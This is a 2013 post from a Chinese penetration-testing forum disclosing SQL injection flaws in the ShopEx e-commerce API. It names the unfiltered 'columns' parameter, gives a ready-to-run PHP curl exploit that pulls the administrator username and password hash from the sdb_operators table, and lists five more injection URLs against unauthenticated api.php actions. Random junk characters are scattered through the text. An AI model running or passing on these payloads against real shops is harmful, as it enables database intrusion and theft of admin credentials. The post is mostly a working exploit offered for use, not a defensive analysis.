中国网络渗透测试联盟

标题: shopEx最新版的API注入漏洞分析附利用exp [打印本页]

作者: admin    时间: 2013-7-27 18:34
标题: shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
1 I9 o7 j1 |5 [! P8 f' [( ^core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
- [& M2 C4 L& q% X
4 Q4 c; d, j0 J  r4 \第44行 $data['columns'] 未做过滤导致注入4 H4 p9 _  Q4 U0 d  O5 C

6 P5 }( m. H3 `# z- i/ S$ K<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.- l* x+ H' H4 a4 P7 r9 g* P7 ^
- a' J# T6 X- Q5 g  g
注射1:
" O' G; u: L/ L% ]
) s. N9 ]5 f" C  n# m+ w3 {http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#% |# V7 D% N) {

  r. S1 \: N$ y& ?注射2:
: t7 T0 s# a% V- N  ]/ L( O$ Nhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}  c* F3 _! C" _# o0 \
. n7 D5 Z+ Q! c! R9 C
注射3:
! Y3 F% v* k( _( {! \% j& n  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx
0 i) H; b# h/ C2 S注射4:8 k3 B9 V( P) ]. G" Y5 g
: j; n$ B$ v$ x. U' [6 }
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1' o& v$ W4 R. e' q0 E- _

& [4 U! L. @6 k1 \6 I& ]( U' y- I% p1 r. e
注射5:9 {7 \' [0 a) ]  z5 y5 c1 U
  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx) J- Z) ]. I2 N8 R
# R4 n" L! q; |* }

1 I( N7 j; \4 E: T$ y0 r$ J, b
) e& J- P' b2 P/ ?
! \, f. W2 h# R& k0 J0 ~
& H& B+ y, s' Y$ d( q  M$ R
3 G- I% U6 ]$ z" N8 z




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2